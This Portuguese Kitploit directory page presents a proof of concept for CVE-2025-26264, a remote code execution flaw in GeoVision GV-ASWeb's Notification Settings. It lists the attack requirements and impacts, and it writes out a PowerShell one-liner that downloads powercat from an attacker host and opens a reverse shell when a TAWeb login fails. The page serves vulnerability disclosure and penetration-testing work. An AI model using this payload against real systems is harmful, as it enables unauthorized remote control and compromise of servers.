Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-26264 — CVE-2025-26264 - GeoVision GV-ASWeb com a versão 6.1.2.0 ou inferior contém uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Configurações de Notificação. Um atacante autenticado com privilégios de "Configurações do Sistema" no ASWeb pode explorar essa falha para executar comandos arbitrários no servidor, levando a um comprometimento total do sistema. | Kitploit
Ferramentas/GitHubGitHub/hxlxmj/cve-2025-26264
Análise de VulnerabilidadesExploraçãoMovimento LateralExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

Ver Repositório
Site
121há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2025-26264 - GeoVision GV-ASWeb com a versão 6.1.2.0 ou inferior contém uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Configurações de Notificação. Um atacante autenticado com privilégios de "Configurações do Sistema" no ASWeb pode explorar essa falha para executar comandos arbitrários no servidor, levando a um comprometimento total do sistema.

Compartilhar

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb com versão 6.1.2.0 ou inferior, contém uma vulnerabilidade de Execução Remota de Código (RCE) no recurso Notification Settings. Um atacante autenticado com privilégios de "System Settings" no ASWeb pode explorar essa falha para executar comandos arbitrários no servidor, levando a um comprometimento total do sistema.

Requisitos

Para realizar um ataque com sucesso, o atacante requer:

  • Acesso de rede ao aplicativo web GV-ASManager com versão 6.1.2.0 ou inferior;
  • Acesso a uma conta com privilégio de gerenciar o recurso Notification Settings.

Impacto

A vulnerabilidade pode ser explorada para realizar as seguintes ações não autorizadas:

  • Uma conta com privilégio de gerenciar o recurso Notification Settings pode:
    • Realizar ataque de Execução Remota de Código.
  • Após o ataque bem-sucedido, o atacante será capaz de:
    • Acessar, modificar ou excluir informações sensíveis do sistema;
    • Instalar uma backdoor no sistema;
    • Realizar ataque de ransomware;
    • Efetuar movimento lateral na rede interna.

CVE-2025-26264 PoC [Testando GeoVision v6.1.2.0]

Explorar a vulnerabilidade de Execução Remota de Código na plataforma ASWeb do GeoVision GV-ASManager é possível em versões 6.1.2.0 ou inferiores (não há correção até 26 de fevereiro de 2025).

A função Notification Setting do ASWeb do GeoVision ASManager está vulnerável a RCE

Requisição HTTP de configuração de uma notificação em um evento específico: falha na tentativa de login do TAWeb

De acordo com este script, se houver uma tentativa de login TAWeb falha, o seguinte script PowerShell será executado:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

Uma tentativa falha de autenticação no TAWeb

Máquina da vítima: O script abre uma backdoor para a máquina do atacante.

Máquina do atacante: O atacante obtém o shell

Contato

Se você tiver alguma dúvida, pode entrar em contato comigo, Giorgi Dograshvili, no LinkedIn.

Baixar ferramenta